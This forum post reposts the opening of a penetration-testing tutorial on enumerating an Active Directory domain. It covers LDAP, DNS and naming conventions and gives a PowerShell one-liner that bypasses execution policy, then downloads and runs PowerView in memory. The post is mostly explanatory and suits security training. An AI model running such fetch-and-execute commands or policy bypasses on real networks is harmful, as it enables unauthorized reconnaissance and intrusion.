Jump to content
Nytro

Active Directory Penetration Dojo

Recommended Posts

Posted

Active Directory Penetration Dojo – AD Environment Enumeration -1

AD_Pentest_Dojo-1200x675.jpg

 

Hi everyone, we’ve discussed basics of Active Directory and different servers in AD in previous blog posts of this series. If you’ve not yet read that, please find that here in Part 1 and Part 2. We’ve also understood trust relationships in AD environment. You can read post on trust relationships here.

Let’s have a look at the current post in which we’ll discuss how to enumerate an active directory domain and map various entities, trusts, relationships and privileges in it.

Few things to understand:

  • LDAP is used by Active directory as its access protocol. So when you enumerate information from AD, your query is sent to it as an LDAP query.

  • AD relies on DNS as its locator service that enables the clients to locate domain controllers and other hosts in the domain through DNS queries.

  • AD Database is NTDS.DIT

 

  • AD supports several Naming conventions like:
    • User Principal name:

      • winsaafman@scriptdotsh.local

    • DN (Distinguished Names) LDAP names:

      • CN = Common name
      • OU = Organisational Unit
      • DC = Domain
      • For example- CN=winsaafman,DC=corp,DC=scriptdotsh,DC=local

UPN.png

  • Any standard domain user can enumerate active directory information. There is no need for administrative rights (not even local administrator).
  • We’ll be using powershell a lot in the enumeration stage. In powershell, you get warning on running the scripts because of the execution policy setting policy. Execution Policy is just a way to stop users from accidentally executing scripts. Not really a security control, because it has builtin bypass parameters. (powershell -ExecutionPolicy bypass) as you can see in screenshot below:

powershell_ep1.png

  • If you don’t want to save powershell module on disk and just load directly into memory and run some of its command, you can try it like this:
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’);Get-NetDomain”
1
powershell.exe -exec Bypass -C IEX (New-Object Net.WebClient).DownloadString(https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1);Get-NetDomain

Beside the -exec Bypass, there are several other ways to evade powershell blocking which is already there on the internet. So I won’t be talking much about that.

We can use the ADSI, .NET classes, DSquery, Powershell frameworks, CMD, WMI, AD Module etc. for enumerating active directory. In current blogpost, we’ll enumerate the domain using the Active Directory powershell module and powerview.  

In the discovery phase, we have to analyse many things about the client environment and locate their PII, network architecture, devices, critical business applications etc. Then finding threats to those critical assets. And looking for misconfigurations, vulnerabilities and weaknesses.

 

Articol complet: https://scriptdotsh.com/index.php/2019/01/01/active-directory-penetration-dojo-ad-environment-enumeration-1/

  • Thanks 1
  • Upvote 2

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...